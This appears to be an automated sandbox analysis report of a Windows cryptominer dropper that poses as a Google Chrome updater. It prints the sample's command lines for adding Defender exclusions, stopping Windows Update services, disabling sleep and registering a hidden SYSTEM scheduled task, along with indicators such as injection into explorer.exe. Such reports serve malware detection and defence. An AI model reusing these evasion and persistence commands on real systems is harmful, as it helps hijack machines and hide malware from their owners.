Analysis
-
max time kernel
300s -
max time network
297s -
platform
windows10-1703_x64 -
resource
win10-20230703-en -
resource tags
arch:x64arch:x86image:win10-20230703-enlocale:en-usos:windows10-1703-x64system -
submitted
08/08/2023, 04:06
Behavioral task
behavioral1
Sample
cb95df0d30e07f020cf18517f7a698e6e0a7a3a60eb01e8e5aca16f1f5b8eb68.exe
Resource
win7-20230712-en
General
-
Target
cb95df0d30e07f020cf18517f7a698e6e0a7a3a60eb01e8e5aca16f1f5b8eb68.exe
-
Size
8.9MB
-
MD5
e2df1fca37cff12eb333d1d11d11d5af
-
SHA1
21a2733360dbd70672448da47843cf6675087d59
-
SHA256
cb95df0d30e07f020cf18517f7a698e6e0a7a3a60eb01e8e5aca16f1f5b8eb68
-
SHA512
9746086f68101b73c92805b18483d3e69d45052abddcf12a9da515d91f023febd3a9385b18ded0ff71e80da1f685b854bceb4f47da8baef23d22a0de0dd33e31
-
SSDEEP
196608:6WOiyabx20kSkWfWTsO8OFyaKnMFkd3EvOdytLmS+SLgKckF3HNo3mNssMryk:PxsHsGgaKbdCOQRmTZpkQv
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
description pid Process procid_target PID 4896 created 3196 4896 cb95df0d30e07f020cf18517f7a698e6e0a7a3a60eb01e8e5aca16f1f5b8eb68.exe 41 PID 4896 created 3196 4896 cb95df0d30e07f020cf18517f7a698e6e0a7a3a60eb01e8e5aca16f1f5b8eb68.exe 41 PID 4896 created 3196 4896 cb95df0d30e07f020cf18517f7a698e6e0a7a3a60eb01e8e5aca16f1f5b8eb68.exe 41 PID 4896 created 3196 4896 cb95df0d30e07f020cf18517f7a698e6e0a7a3a60eb01e8e5aca16f1f5b8eb68.exe 41 PID 4896 created 3196 4896 cb95df0d30e07f020cf18517f7a698e6e0a7a3a60eb01e8e5aca16f1f5b8eb68.exe 41 PID 5044 created 3196 5044 updater.exe 41 PID 5044 created 3196 5044 updater.exe 41 PID 5044 created 3196 5044 updater.exe 41 PID 5044 created 3196 5044 updater.exe 41 PID 5044 created 3196 5044 updater.exe 41 PID 5044 created 3196 5044 updater.exe 41 -
XMRig Miner payload 23 IoCs
resource yara_rule behavioral2/memory/5044-714-0x00007FF674D10000-0x00007FF675D88000-memory.dmp xmrig behavioral2/memory/1060-723-0x00007FF7254D0000-0x00007FF725CBF000-memory.dmp xmrig behavioral2/memory/1060-725-0x00007FF7254D0000-0x00007FF725CBF000-memory.dmp xmrig behavioral2/memory/1060-728-0x00007FF7254D0000-0x00007FF725CBF000-memory.dmp xmrig behavioral2/memory/1060-731-0x00007FF7254D0000-0x00007FF725CBF000-memory.dmp xmrig behavioral2/memory/1060-733-0x00007FF7254D0000-0x00007FF725CBF000-memory.dmp xmrig behavioral2/memory/1060-735-0x00007FF7254D0000-0x00007FF725CBF000-memory.dmp xmrig behavioral2/memory/1060-737-0x00007FF7254D0000-0x00007FF725CBF000-memory.dmp xmrig behavioral2/memory/1060-739-0x00007FF7254D0000-0x00007FF725CBF000-memory.dmp xmrig behavioral2/memory/1060-741-0x00007FF7254D0000-0x00007FF725CBF000-memory.dmp xmrig behavioral2/memory/1060-743-0x00007FF7254D0000-0x00007FF725CBF000-memory.dmp xmrig behavioral2/memory/1060-745-0x00007FF7254D0000-0x00007FF725CBF000-memory.dmp xmrig behavioral2/memory/1060-747-0x00007FF7254D0000-0x00007FF725CBF000-memory.dmp xmrig behavioral2/memory/1060-749-0x00007FF7254D0000-0x00007FF725CBF000-memory.dmp xmrig behavioral2/memory/1060-751-0x00007FF7254D0000-0x00007FF725CBF000-memory.dmp xmrig behavioral2/memory/1060-753-0x00007FF7254D0000-0x00007FF725CBF000-memory.dmp xmrig behavioral2/memory/1060-755-0x00007FF7254D0000-0x00007FF725CBF000-memory.dmp xmrig behavioral2/memory/1060-757-0x00007FF7254D0000-0x00007FF725CBF000-memory.dmp xmrig behavioral2/memory/1060-759-0x00007FF7254D0000-0x00007FF725CBF000-memory.dmp xmrig behavioral2/memory/1060-761-0x00007FF7254D0000-0x00007FF725CBF000-memory.dmp xmrig behavioral2/memory/1060-763-0x00007FF7254D0000-0x00007FF725CBF000-memory.dmp xmrig behavioral2/memory/1060-765-0x00007FF7254D0000-0x00007FF725CBF000-memory.dmp xmrig behavioral2/memory/1060-767-0x00007FF7254D0000-0x00007FF725CBF000-memory.dmp xmrig -
Drops file in Drivers directory 2 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts updater.exe File created C:\Windows\System32\drivers\etc\hosts cb95df0d30e07f020cf18517f7a698e6e0a7a3a60eb01e8e5aca16f1f5b8eb68.exe -
Stops running service(s) 3 TTPs
-
Executes dropped EXE 1 IoCs
pid Process 5044 updater.exe -
resource yara_rule behavioral2/memory/4896-122-0x00007FF600860000-0x00007FF6018D8000-memory.dmp themida behavioral2/memory/4896-129-0x00007FF600860000-0x00007FF6018D8000-memory.dmp themida behavioral2/memory/4896-130-0x00007FF600860000-0x00007FF6018D8000-memory.dmp themida behavioral2/memory/4896-131-0x00007FF600860000-0x00007FF6018D8000-memory.dmp themida behavioral2/memory/4896-132-0x00007FF600860000-0x00007FF6018D8000-memory.dmp themida behavioral2/memory/4896-133-0x00007FF600860000-0x00007FF6018D8000-memory.dmp themida behavioral2/memory/4896-134-0x00007FF600860000-0x00007FF6018D8000-memory.dmp themida behavioral2/memory/4896-135-0x00007FF600860000-0x00007FF6018D8000-memory.dmp themida behavioral2/memory/4896-187-0x00007FF600860000-0x00007FF6018D8000-memory.dmp themida behavioral2/memory/4896-239-0x00007FF600860000-0x00007FF6018D8000-memory.dmp themida behavioral2/files/0x000900000001b06f-243.dat themida behavioral2/files/0x000900000001b06f-244.dat themida behavioral2/memory/5044-245-0x00007FF674D10000-0x00007FF675D88000-memory.dmp themida behavioral2/memory/5044-252-0x00007FF674D10000-0x00007FF675D88000-memory.dmp themida behavioral2/memory/5044-253-0x00007FF674D10000-0x00007FF675D88000-memory.dmp themida behavioral2/memory/5044-254-0x00007FF674D10000-0x00007FF675D88000-memory.dmp themida behavioral2/memory/5044-255-0x00007FF674D10000-0x00007FF675D88000-memory.dmp themida behavioral2/memory/5044-256-0x00007FF674D10000-0x00007FF675D88000-memory.dmp themida behavioral2/memory/5044-257-0x00007FF674D10000-0x00007FF675D88000-memory.dmp themida behavioral2/memory/5044-258-0x00007FF674D10000-0x00007FF675D88000-memory.dmp themida behavioral2/memory/5044-291-0x00007FF674D10000-0x00007FF675D88000-memory.dmp themida behavioral2/memory/5044-693-0x00007FF674D10000-0x00007FF675D88000-memory.dmp themida behavioral2/memory/5044-714-0x00007FF674D10000-0x00007FF675D88000-memory.dmp themida -
Drops file in System32 directory 3 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 4896 cb95df0d30e07f020cf18517f7a698e6e0a7a3a60eb01e8e5aca16f1f5b8eb68.exe 5044 updater.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 5044 set thread context of 660 5044 updater.exe 109 PID 5044 set thread context of 1060 5044 updater.exe 110 -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Google\Chrome\updater.exe cb95df0d30e07f020cf18517f7a698e6e0a7a3a60eb01e8e5aca16f1f5b8eb68.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4204 sc.exe 4848 sc.exe 3856 sc.exe 2800 sc.exe 4572 sc.exe 2344 sc.exe 4168 sc.exe 5016 sc.exe 2552 sc.exe 2888 sc.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4896 cb95df0d30e07f020cf18517f7a698e6e0a7a3a60eb01e8e5aca16f1f5b8eb68.exe 4896 cb95df0d30e07f020cf18517f7a698e6e0a7a3a60eb01e8e5aca16f1f5b8eb68.exe 4992 powershell.exe 4992 powershell.exe 4992 powershell.exe 4896 cb95df0d30e07f020cf18517f7a698e6e0a7a3a60eb01e8e5aca16f1f5b8eb68.exe 4896 cb95df0d30e07f020cf18517f7a698e6e0a7a3a60eb01e8e5aca16f1f5b8eb68.exe 4896 cb95df0d30e07f020cf18517f7a698e6e0a7a3a60eb01e8e5aca16f1f5b8eb68.exe 4896 cb95df0d30e07f020cf18517f7a698e6e0a7a3a60eb01e8e5aca16f1f5b8eb68.exe 4896 cb95df0d30e07f020cf18517f7a698e6e0a7a3a60eb01e8e5aca16f1f5b8eb68.exe 4896 cb95df0d30e07f020cf18517f7a698e6e0a7a3a60eb01e8e5aca16f1f5b8eb68.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 4896 cb95df0d30e07f020cf18517f7a698e6e0a7a3a60eb01e8e5aca16f1f5b8eb68.exe 4896 cb95df0d30e07f020cf18517f7a698e6e0a7a3a60eb01e8e5aca16f1f5b8eb68.exe 5044 updater.exe 5044 updater.exe 5000 powershell.exe 5000 powershell.exe 5000 powershell.exe 5044 updater.exe 5044 updater.exe 5044 updater.exe 5044 updater.exe 5044 updater.exe 5044 updater.exe 1360 powershell.exe 1360 powershell.exe 1360 powershell.exe 5044 updater.exe 5044 updater.exe 5044 updater.exe 5044 updater.exe 1060 explorer.exe 1060 explorer.exe 1060 explorer.exe 1060 explorer.exe 1060 explorer.exe 1060 explorer.exe 1060 explorer.exe 1060 explorer.exe 1060 explorer.exe 1060 explorer.exe 1060 explorer.exe 1060 explorer.exe 1060 explorer.exe 1060 explorer.exe 1060 explorer.exe 1060 explorer.exe 1060 explorer.exe 1060 explorer.exe 1060 explorer.exe 1060 explorer.exe 1060 explorer.exe 1060 explorer.exe 1060 explorer.exe 1060 explorer.exe 1060 explorer.exe 1060 explorer.exe 1060 explorer.exe 1060 explorer.exe 1060 explorer.exe 1060 explorer.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 636 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4992 powershell.exe Token: SeIncreaseQuotaPrivilege 4992 powershell.exe Token: SeSecurityPrivilege 4992 powershell.exe Token: SeTakeOwnershipPrivilege 4992 powershell.exe Token: SeLoadDriverPrivilege 4992 powershell.exe Token: SeSystemProfilePrivilege 4992 powershell.exe Token: SeSystemtimePrivilege 4992 powershell.exe Token: SeProfSingleProcessPrivilege 4992 powershell.exe Token: SeIncBasePriorityPrivilege 4992 powershell.exe Token: SeCreatePagefilePrivilege 4992 powershell.exe Token: SeBackupPrivilege 4992 powershell.exe Token: SeRestorePrivilege 4992 powershell.exe Token: SeShutdownPrivilege 4992 powershell.exe Token: SeDebugPrivilege 4992 powershell.exe Token: SeSystemEnvironmentPrivilege 4992 powershell.exe Token: SeRemoteShutdownPrivilege 4992 powershell.exe Token: SeUndockPrivilege 4992 powershell.exe Token: SeManageVolumePrivilege 4992 powershell.exe Token: 33 4992 powershell.exe Token: 34 4992 powershell.exe Token: 35 4992 powershell.exe Token: 36 4992 powershell.exe Token: SeShutdownPrivilege 1444 powercfg.exe Token: SeCreatePagefilePrivilege 1444 powercfg.exe Token: SeShutdownPrivilege 4464 powercfg.exe Token: SeCreatePagefilePrivilege 4464 powercfg.exe Token: SeDebugPrivilege 3560 powershell.exe Token: SeShutdownPrivilege 4176 powercfg.exe Token: SeCreatePagefilePrivilege 4176 powercfg.exe Token: SeShutdownPrivilege 1412 powercfg.exe Token: SeCreatePagefilePrivilege 1412 powercfg.exe Token: SeIncreaseQuotaPrivilege 3560 powershell.exe Token: SeSecurityPrivilege 3560 powershell.exe Token: SeTakeOwnershipPrivilege 3560 powershell.exe Token: SeLoadDriverPrivilege 3560 powershell.exe Token: SeSystemProfilePrivilege 3560 powershell.exe Token: SeSystemtimePrivilege 3560 powershell.exe Token: SeProfSingleProcessPrivilege 3560 powershell.exe Token: SeIncBasePriorityPrivilege 3560 powershell.exe Token: SeCreatePagefilePrivilege 3560 powershell.exe Token: SeBackupPrivilege 3560 powershell.exe Token: SeRestorePrivilege 3560 powershell.exe Token: SeShutdownPrivilege 3560 powershell.exe Token: SeDebugPrivilege 3560 powershell.exe Token: SeSystemEnvironmentPrivilege 3560 powershell.exe Token: SeRemoteShutdownPrivilege 3560 powershell.exe Token: SeUndockPrivilege 3560 powershell.exe Token: SeManageVolumePrivilege 3560 powershell.exe Token: 33 3560 powershell.exe Token: 34 3560 powershell.exe Token: 35 3560 powershell.exe Token: 36 3560 powershell.exe Token: SeIncreaseQuotaPrivilege 3560 powershell.exe Token: SeSecurityPrivilege 3560 powershell.exe Token: SeTakeOwnershipPrivilege 3560 powershell.exe Token: SeLoadDriverPrivilege 3560 powershell.exe Token: SeSystemProfilePrivilege 3560 powershell.exe Token: SeSystemtimePrivilege 3560 powershell.exe Token: SeProfSingleProcessPrivilege 3560 powershell.exe Token: SeIncBasePriorityPrivilege 3560 powershell.exe Token: SeCreatePagefilePrivilege 3560 powershell.exe Token: SeBackupPrivilege 3560 powershell.exe Token: SeRestorePrivilege 3560 powershell.exe Token: SeShutdownPrivilege 3560 powershell.exe -
Suspicious use of WriteProcessMemory 38 IoCs
description pid Process procid_target PID 2940 wrote to memory of 4572 2940 cmd.exe 75 PID 2940 wrote to memory of 4572 2940 cmd.exe 75 PID 2940 wrote to memory of 4204 2940 cmd.exe 76 PID 2940 wrote to memory of 4204 2940 cmd.exe 76 PID 2940 wrote to memory of 4848 2940 cmd.exe 77 PID 2940 wrote to memory of 4848 2940 cmd.exe 77 PID 2940 wrote to memory of 2344 2940 cmd.exe 78 PID 2940 wrote to memory of 2344 2940 cmd.exe 78 PID 2940 wrote to memory of 4168 2940 cmd.exe 79 PID 2940 wrote to memory of 4168 2940 cmd.exe 79 PID 3728 wrote to memory of 1444 3728 cmd.exe 84 PID 3728 wrote to memory of 1444 3728 cmd.exe 84 PID 3728 wrote to memory of 4464 3728 cmd.exe 85 PID 3728 wrote to memory of 4464 3728 cmd.exe 85 PID 3728 wrote to memory of 4176 3728 cmd.exe 86 PID 3728 wrote to memory of 4176 3728 cmd.exe 86 PID 3728 wrote to memory of 1412 3728 cmd.exe 87 PID 3728 wrote to memory of 1412 3728 cmd.exe 87 PID 4856 wrote to memory of 3856 4856 cmd.exe 96 PID 4856 wrote to memory of 3856 4856 cmd.exe 96 PID 4856 wrote to memory of 5016 4856 cmd.exe 97 PID 4856 wrote to memory of 5016 4856 cmd.exe 97 PID 4856 wrote to memory of 2552 4856 cmd.exe 98 PID 4856 wrote to memory of 2552 4856 cmd.exe 98 PID 4856 wrote to memory of 2888 4856 cmd.exe 99 PID 4856 wrote to memory of 2888 4856 cmd.exe 99 PID 4856 wrote to memory of 2800 4856 cmd.exe 100 PID 4856 wrote to memory of 2800 4856 cmd.exe 100 PID 4424 wrote to memory of 4512 4424 cmd.exe 104 PID 4424 wrote to memory of 4512 4424 cmd.exe 104 PID 4424 wrote to memory of 5072 4424 cmd.exe 106 PID 4424 wrote to memory of 5072 4424 cmd.exe 106 PID 4424 wrote to memory of 4156 4424 cmd.exe 107 PID 4424 wrote to memory of 4156 4424 cmd.exe 107 PID 4424 wrote to memory of 4820 4424 cmd.exe 108 PID 4424 wrote to memory of 4820 4424 cmd.exe 108 PID 5044 wrote to memory of 660 5044 updater.exe 109 PID 5044 wrote to memory of 1060 5044 updater.exe 110
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3196
-
C:\Users\Admin\AppData\Local\Temp\cb95df0d30e07f020cf18517f7a698e6e0a7a3a60eb01e8e5aca16f1f5b8eb68.exe"C:\Users\Admin\AppData\Local\Temp\cb95df0d30e07f020cf18517f7a698e6e0a7a3a60eb01e8e5aca16f1f5b8eb68.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:4896
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4992
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:2940 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:4572
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:4204
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:4848
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2344
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:4168
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fyhjjuwy#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3560
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:3728 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1444
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4464
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4176
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1412
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:5028
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:5000
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:4856 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:3856
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:5016
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:2552
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2888
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:2800
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:4424 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:4512
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:5072
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:4156
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:4820
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fyhjjuwy#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1360
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:660
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1060
-
-
